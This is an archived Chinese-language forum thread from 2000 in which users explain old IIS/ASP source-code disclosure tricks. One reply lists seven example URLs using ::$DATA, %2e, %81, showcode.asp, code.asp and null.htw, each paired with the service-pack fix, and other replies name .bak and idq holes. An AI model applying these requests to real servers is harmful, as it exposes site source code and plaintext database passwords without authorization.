社区
ASP
帖子详情
查看asp源代码
Focus_zhao
2000-07-23 08:58:00
我在一本书上看到说ASP的安全性很差,后面加个::$DATA就可以看到源代码了。我试了一下,在地址后加上了?::$DATA,可是没什么效果。请问这里有没有人知道这个参数怎么用?多谢。
...全文
755
12
打赏
收藏
查看asp源代码
我在一本书上看到说ASP的安全性很差,后面加个::$DATA就可以看到源代码了。我试了一下,在地址后加上了?::$DATA,可是没什么效果。请问这里有没有人知道这个参数怎么用?多谢。
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
12 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
april_d
2001-11-19
打赏
举报
回复
try
堆堆
2000-07-26
打赏
举报
回复
null.htw和idq有什么漏洞?
Cobra
2000-07-26
打赏
举报
回复
可以试试下面的7种方法
1、http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp?source=/msadc/Samples/SELECTOR/showcode.asp 解决方案:删除showcode.asp
2、http://somewhere/something.asp::$DATA 解决方案: 装sp3
3、http://somewhere/something.asp%2e 解决方案: 装sp4
或者 http://somewhere/something.asp.(加一个点) 解决方案: 装sp4
4、 http://somewhere/something%2e%41sp
或者L http://somewhere/something%2e%asp 解决方案: 装sp4
5、http://somewhere/something.asp%81 解决方案:装sp6或者打补丁
6、http://somewhere/iissamples/exair/howitworks/code.asp?source=xxx.asp
7.http://somewhere/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full
最大的危害莫过于asa文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;
yagami
2000-07-26
打赏
举报
回复
null.htw能得到ASP代码.idq能得到网站的目录结构.
netsong
2000-07-24
打赏
举报
回复
装上了sp6就修正了这个bug。
有时对于sp4,用::$DATA查看时白屏,可查看原文件获得asp源程序
Tyro
2000-07-24
打赏
举报
回复
这个办法已经过时了,只有很少的网站能够用这个办法看到源码,大部分网站已经补上了这个漏洞
Focus_zhao
2000-07-24
打赏
举报
回复
没明白,请具体讲讲,用了那个参数之后再做什末才能看到代码?
yagami
2000-07-24
打赏
举报
回复
null.htw呢?
www.csdn.net也不过是前不久才打的补丁.外面没有打补丁的站多了.Service Pack又不是万能的.
还有idq漏洞.这个洞expert.csdn.net也没有补.一样可以拿到源代码的.我才没空搞破坏了.不过请csdn站长注意了!
yagami
2000-07-24
打赏
举报
回复
::$DATA已是很老的一种.还有:
%81
%2e
%2e%41sp
code.asp
showcode.asp
null.htw
longhtr
some.asp.bak
dvwssr.dll
具体的你去看<<高手们、黑客们、难题!!!(2)>>这帖好了.
siva
2000-07-23
打赏
举报
回复
csdn有相关文章,找找去吧
mjs2000
2000-07-23
打赏
举报
回复
IIS是一个问题,如果你的IIS版本低只要你装了Sp5或Sp6都不会让你用::$DATA查看原代码。
dark
2000-07-23
打赏
举报
回复
看你用的IIS是什么版本了,微软已修正了这个BUG了
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET+SQL网上购物商城
源代码
ASP
.NET通用权限管理系统
源代码
(含文档、数据库)
ASP
.NET通用权限管理系统
源代码
(含文档、数据库) 1.菜单导航管理 2.操作按钮 3.角色管理 4.部门管理 5.用户管理(用户权限) 6.用户组管理(设置成员,用户组权限) 7.系统配置(动态配置系统参数) 8.附加属性(自定义属性) 9.系统日志(异常记录) 10.数据库备份/还原 11.资源管理,(动态数据库) 12.个人信息(基本信息,附加信息,用户角色,拥有权限) 13.首页快捷 14.数据回收站(业务功能删除过数据,全部保留在回收站) 15.系统个性化设置(切换菜单导航)
ASP
.NET开发典型模块大全 (修订版) (
源代码
)
《
ASP
.NET开发典型模块大全(修订版)》以关键技术和热点技术为核心,通过27个典型模块和5章热点技术,全面地介绍了如何使用
asp
.net进行各领域的web项目开发。全书共3篇分为32章,第1篇关键模块篇,覆盖网站开发的关键领域,内容涉及论坛、博客、播客、网络硬盘、电子邮件、在线考试、网站备忘录、在线短消息、网站访问量统计与分析、系统后台管理权限分配等网站关键模块;第2篇常见模块篇,覆盖网站开发的各个领域,内容涉及网站会员注册及登录、会员密码找回、留言本、上传与下载、图片资源管理、搜索引擎、网上问卷调查、rss在线订阅、聊天室、购物车、在线银行支付、手机短消息管理、在线音乐、投票系统、万能打印、数据自动备份与恢复等常见模块;第3篇热点技术应用篇,解决网站开发在某个领域遇到的技术难题,内容涉及linq数据访问技术、安全技术、服务技术、ajax、高级应用技术等。 《
ASP
.NET开发典型模块大全(修订版)》附有配套光盘。光盘提供了书中所有案例的全部
源代码
,并经过精心调试,在windows xp和windows 2000下全部通过,保证能够正常运行。此外,光盘中还提供有编程词典试用版软件。 《
ASP
.NET开发典型模块大全(修订版)》案例涉及领域广泛,实用性非常强。学习本书读者可以了解各个领域的特点,能够针对某一行业进行软件开发,也可以通过光盘中提供的模块
源代码
进行二次开发,以减少开发系统所需要的时间。本书适合各级软件开发人员学习使用,也可供大、中专院校师生学习参考。
MVC4 项目
源代码
asp
.net mvc4
源代码
很适合初学者 有很详细的注释 开发必备
实战突击
ASP
.NET 项目开发案例整合
源代码
明日科技
说明:《实战突击
ASP
.NET 项目开发案例整合》 随书
源代码
人民邮电出版社 明日科技出版
ASP
28,391
社区成员
357,059
社区内容
发帖
与我相关
我的任务
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
复制链接
扫一扫
分享
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章